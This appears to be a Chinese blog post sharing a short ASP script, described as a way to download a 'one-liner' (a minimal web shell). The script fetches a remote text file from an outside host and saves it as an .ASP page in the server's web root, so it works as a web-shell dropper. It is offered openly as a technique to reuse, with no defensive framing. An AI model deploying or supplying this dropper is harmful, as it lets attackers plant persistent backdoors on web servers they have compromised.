asp中通过xmlhttp下载一句话代码,需要的朋友可以参考下

分享一下 在3est活动中学习的godlong的 代码如下: % Set xPost = createObject('Microsoft.XMLHTTP') xPost.Open 'GET','http://www.fxxxx.com/1.txt',0 ''下载文件的地址 xPost.Send() Set sGet = createObject('ADODB.Stream') sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.res

作者: 来源: 时间: 17-11-23 16:08:56

分享一下
在3est活动中学习的godlong的
代码如下:
<%
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.fxxxx.com/1.txt",0 ''下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "E:\WWWROOT uck1.ASP",2
%>
11
22
33
隐藏区块

会员注册

本功能为预留功能,暂不支持注册 ^_^

Login

社交帐号登陆

使用以下任意帐号可登陆本站

Close section
Close

联系我们

关于5UCMS 您有任何需求 均可以留言给我们